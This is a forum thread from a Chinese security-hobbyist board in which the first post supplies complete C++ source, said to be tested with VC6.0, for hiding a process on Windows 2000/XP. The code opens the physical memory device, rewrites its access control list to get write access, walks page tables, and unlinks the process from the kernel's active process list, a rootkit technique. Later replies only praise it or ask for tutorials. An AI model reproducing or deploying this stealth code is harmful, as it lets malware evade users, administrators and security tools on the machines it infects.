Board logo

标题: 在2000和xp下,隐藏进程,VC6.0测试通过!!! [打印本页]

作者: 噯伱╅詠吥變    时间: 2008-6-17 13:03     标题: 在2000和xp下,隐藏进程,VC6.0测试通过!!!

在2000和xp下,隐藏进程,VC6.0测试通过!!!


头文件
  1. //////////////////////////////////////
  2. //HideProcess.h
  3. BOOL HideProcess();
复制代码
CPP源文件:
  1. /////////////////////////////////////////////////////////////////////////////
  2. //HideProcess.cpp
  3. #include<windows.h>
  4. #include<Accctrl.h>
  5. #include<Aclapi.h>

  6. #include"HideProcess.h"

  7. #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
  8. #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
  9. #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

  10. typedef LONG NTSTATUS;

  11. typedef struct _IO_STATUS_BLOCK
  12. {
  13.     NTSTATUS Status;
  14.     ULONG Information;
  15. } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

  16. typedef struct _UNICODE_STRING
  17. {
  18.     USHORT Length;
  19.     USHORT MaximumLength;
  20.     PWSTR Buffer;
  21. } UNICODE_STRING, *PUNICODE_STRING;

  22. #define OBJ_INHERIT                0x00000002L
  23. #define OBJ_PERMANENT            0x00000010L
  24. #define OBJ_EXCLUSIVE            0x00000020L
  25. #define OBJ_CASE_INSENSITIVE    0x00000040L
  26. #define OBJ_OPENIF                0x00000080L
  27. #define OBJ_OPENLINK            0x00000100L
  28. #define OBJ_KERNEL_HANDLE        0x00000200L
  29. #define OBJ_VALID_ATTRIBUTES    0x000003F2L

  30. typedef struct _OBJECT_ATTRIBUTES
  31. {
  32.     ULONG Length;
  33.     HANDLE RootDirectory;
  34.     PUNICODE_STRING ObjectName;
  35.     ULONG Attributes;
  36.     PVOID SecurityDescriptor;
  37.     PVOID SecurityQualityOfService;
  38. } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

  39. typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
  40.     OUT PHANDLE SectionHandle,
  41.     IN ACCESS_MASK DesiredAccess,
  42.     IN POBJECT_ATTRIBUTES ObjectAttributes
  43.     );

  44. typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
  45.     IN OUT PUNICODE_STRING DestinationString,
  46.     IN PCWSTR SourceString
  47.     );

  48. RTLINITUNICODESTRING RtlInitUnicodeString;
  49. ZWOPENSECTION ZwOpenSection;
  50. HMODULE g_hNtDLL = NULL;
  51. PVOID g_pMapPhysicalMemory = NULL;
  52. HANDLE g_hMPM = NULL;
  53. OSVERSIONINFO g_osvi;
  54. //---------------------------------------------------------------------------
  55. BOOL InitNTDLL()
  56. {
  57.     g_hNtDLL = LoadLibrary("ntdll.dll");

  58.     if (NULL == g_hNtDLL)
  59.         return FALSE;

  60.     RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

  61. "RtlInitUnicodeString");
  62.     ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

  63.     return TRUE;
  64. }
  65. //---------------------------------------------------------------------------
  66. VOID CloseNTDLL()
  67. {
  68.     if(NULL != g_hNtDLL)
  69.         FreeLibrary(g_hNtDLL);

  70.     g_hNtDLL = NULL;
  71. }
  72. //---------------------------------------------------------------------------
  73. VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
  74. {
  75.     PACL pDacl                    = NULL;
  76.     PSECURITY_DESCRIPTOR pSD    = NULL;
  77.     PACL pNewDacl = NULL;
  78.    
  79.     DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

  80. NULL, &pDacl, NULL, &pSD);

  81.     if(ERROR_SUCCESS != dwRes)
  82.     {

  83.     if(pSD)
  84.         LocalFree(pSD);
  85.     if(pNewDacl)
  86.         LocalFree(pNewDacl);
  87.     }

  88.     EXPLICIT_ACCESS ea;
  89.     RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
  90.     ea.grfAccessPermissions = SECTION_MAP_WRITE;
  91.     ea.grfAccessMode = GRANT_ACCESS;
  92.     ea.grfInheritance= NO_INHERITANCE;
  93.     ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
  94.     ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
  95.     ea.Trustee.ptstrName = "CURRENT_USER";

  96.     dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
  97.    
  98.     if(ERROR_SUCCESS != dwRes)
  99.     {

  100.     if(pSD)
  101.         LocalFree(pSD);
  102.     if(pNewDacl)
  103.         LocalFree(pNewDacl);
  104.     }
  105.     dwRes = SetSecurityInfo

  106. (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
  107.    
  108.     if(ERROR_SUCCESS != dwRes)
  109.     {

  110.     if(pSD)
  111.         LocalFree(pSD);
  112.     if(pNewDacl)
  113.         LocalFree(pNewDacl);
  114.     }

  115. }
  116. //---------------------------------------------------------------------------
  117. HANDLE OpenPhysicalMemory()
  118. {
  119.     NTSTATUS status;
  120.     UNICODE_STRING physmemString;
  121.     OBJECT_ATTRIBUTES attributes;
  122.     ULONG PhyDirectory;

  123.     g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  124.     GetVersionEx (&g_osvi);

  125.     if (5 != g_osvi.dwMajorVersion)
  126.         return NULL;

  127.     switch(g_osvi.dwMinorVersion)
  128.     {
  129.         case 0:
  130.             PhyDirectory = 0x30000;
  131.             break; //2k
  132.         case 1:
  133.             PhyDirectory = 0x39000;
  134.             break; //xp
  135.         default:
  136.             return NULL;
  137.     }

  138.     RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

  139.     attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
  140.     attributes.RootDirectory            = NULL;
  141.     attributes.ObjectName                = &physmemString;
  142.     attributes.Attributes                = 0;
  143.     attributes.SecurityDescriptor        = NULL;
  144.     attributes.SecurityQualityOfService    = NULL;

  145.     status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

  146.     if(status == STATUS_ACCESS_DENIED)
  147.     {
  148.         status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
  149.         SetPhyscialMemorySectionCanBeWrited(g_hMPM);
  150.         CloseHandle(g_hMPM);
  151.         status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
  152.     }

  153.     if(!NT_SUCCESS(status))
  154.         return NULL;

  155.     g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

  156. 0x1000);

  157.     if( g_pMapPhysicalMemory == NULL )
  158.         return NULL;

  159.     return g_hMPM;
  160. }
  161. //---------------------------------------------------------------------------
  162. PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
  163. {
  164.     ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
  165.     PGDE = BaseAddress[VAddr>>22];

  166.     if (0 == (PGDE&1))
  167.         return 0;

  168.     ULONG tmp = PGDE & 0x00000080;

  169.     if (0 != tmp)
  170.     {
  171.         PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
  172.     }
  173.     else
  174.     {
  175.         PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
  176.         PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
  177.         
  178.         if (0 == (PTE&1))
  179.             return 0;

  180.         PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
  181.         UnmapViewOfFile((PVOID)PGDE);
  182.     }

  183.     return (PVOID)PAddr;
  184. }
  185. //---------------------------------------------------------------------------
  186. ULONG GetData(PVOID addr)
  187. {
  188.     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
  189.     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

  190. 0xfffff000, 0x1000);
  191.    
  192.     if (0 == tmp)
  193.         return 0;

  194.     ULONG ret = tmp[(phys & 0xFFF)>>2];
  195.     UnmapViewOfFile(tmp);

  196.     return ret;
  197. }
  198. //---------------------------------------------------------------------------
  199. BOOL SetData(PVOID addr,ULONG data)
  200. {
  201.     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
  202.     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

  203.     if (0 == tmp)
  204.         return FALSE;

  205.     tmp[(phys & 0xFFF)>>2] = data;
  206.     UnmapViewOfFile(tmp);

  207.     return TRUE;
  208. }
  209. //---------------------------------------------------------------------------
  210. long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
  211. {
  212.    ExitProcess(0);
  213.    return 1 ;
  214. }
  215. //---------------------------------------------------------------------------
  216. BOOL YHideProcess()
  217. {
  218. //    SetUnhandledExceptionFilter(exeception);

  219.     if (FALSE == InitNTDLL())
  220.         return FALSE;

  221.     if (0 == OpenPhysicalMemory())
  222.         return FALSE;

  223.     ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
  224.     ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

  225.     ULONG fw, bw;
  226.     if (0 == g_osvi.dwMinorVersion)
  227.     {
  228.         fw = GetData(PVOID(process + 0xa0));
  229.         bw = GetData(PVOID(process + 0xa4));        
  230.     }

  231.     if (1 == g_osvi.dwMinorVersion)
  232.     {
  233.         fw = GetData(PVOID(process + 0x88));
  234.         bw = GetData(PVOID(process + 0x8c));
  235.     }
  236.         
  237.     SetData(PVOID(fw + 4), bw);
  238.     SetData(PVOID(bw), fw);

  239.     CloseHandle(g_hMPM);
  240.     CloseNTDLL();

  241.     return TRUE;
  242. }

  243. BOOL HideProcess()
  244. {
  245. static BOOL b_hide = false;
  246. if (!b_hide)
  247. {
  248.   b_hide = true;
  249.   YHideProcess();
  250.   return true;
  251. }
  252. return true;
  253. }
复制代码

作者: Sun    时间: 2008-6-17 13:08

没有学过

希望楼主可以发个什么连载的教程就好了
作者: hilarylove    时间: 2008-11-27 12:31

好强大~是你自己写的吗??我砸写不出啊。。。汗
作者: 梦影    时间: 2008-11-27 15:58

不错的东东。




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2